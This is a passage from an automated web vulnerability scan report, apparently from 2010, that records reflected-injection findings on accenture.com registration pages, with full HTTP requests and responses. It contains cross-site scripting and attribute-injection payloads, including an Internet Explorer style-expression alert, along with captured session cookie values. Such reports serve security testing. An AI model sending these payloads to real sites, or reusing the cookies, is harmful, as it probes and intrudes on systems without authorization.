Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Location: https://www.accenture.com/Accenture/Registration/LoginPage.aspx4ae7d'style='x:expression(alert(1))'5890a800d50
Content-Type: text/html; charset=utf-8
Content-Length: 227
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 16:47:55 GMT
Connection: close
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:47:55 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.accenture.com/Accenture/Registration/LoginPage.aspx4ae7d'style='x:expression(alert(1))'5890a800d50'>here<
...[SNIP]...

1.1436. http://www.accenture.com/Accenture/Registration/SignOutPage.aspx [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.accenture.com
Path:   /Accenture/Registration/SignOutPage.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2da4c'%20a%3db%2018a8563620b was submitted in the REST URL parameter 1. This input was echoed as 2da4c' a=b 18a8563620b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Accenture2da4c'%20a%3db%2018a8563620b/Registration/SignOutPage.aspx HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /Accenture/DefaultErrorPage.htm?aspxerrorpath=/Accenture2da4c' a=b 18a8563620b/Registration/SignOutPage.aspx
Content-Type: text/html; charset=utf-8
Content-Length: 225
Vary: Accept-Encoding
Cache-Control: private, max-age=43200
Date: Sun, 21 Nov 2010 16:48:05 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/Accenture/DefaultErrorPage.htm?aspxerrorpath=/Accenture2da4c' a=b 18a8563620b/Registration/SignOutPage.aspx'>here</a
...[SNIP]...

1.1437. http://www.accenture.com/Accenture/Registration/SignOutPage.aspx [REST URL parameter 2]

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.accenture.com
Path:   /Accenture/Registration/SignOutPage.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8f2e'%20a%3db%20588b8c9f4f1 was submitted in the REST URL parameter 2. This input was echoed as a8f2e' a=b 588b8c9f4f1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Accenture/Registrationa8f2e'%20a%3db%20588b8c9f4f1/SignOutPage.aspx HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Pragma: no-cache
Location: http://www.accenture.com/Accenture/DefaultErrorPage.htm?aspxerrorpath=/Accenture/Registrationa8f2e' a=b 588b8c9f4f1/SignOutPage.aspx
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 249
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Sun, 21 Nov 2010 16:48:11 GMT
Date: Sun, 21 Nov 2010 16:48:11 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://www.accenture.com/Accenture/DefaultErrorPage.htm?aspxerrorpath=/Accenture/Registrationa8f2e' a=b 588b8c9f4f1/SignOutPage.aspx'>
...[SNIP]...

1.1438. http://www.accenture.com/Accenture/Registration/SignOutPage.aspx [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /Accenture/Registration/SignOutPage.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c620b'style%3d'x%3aexpression(alert(1))'749a846ac09 was submitted in the REST URL parameter 3. This input was echoed as c620b'style='x:expression(alert(1))'749a846ac09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Accenture/Registration/SignOutPage.aspxc620b'style%3d'x%3aexpression(alert(1))'749a846ac09 HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Location: https://www.accenture.com/Accenture/Registration/SignOutPage.aspxc620b'style='x:expression(alert(1))'749a846ac09
Content-Type: text/html; charset=utf-8
Content-Length: 229
Date: Sun, 21 Nov 2010 16:48:14 GMT
Connection: close
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:14 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.accenture.com/Accenture/Registration/SignOutPage.aspxc620b'style='x:expression(alert(1))'749a846ac09'>her
...[SNIP]...
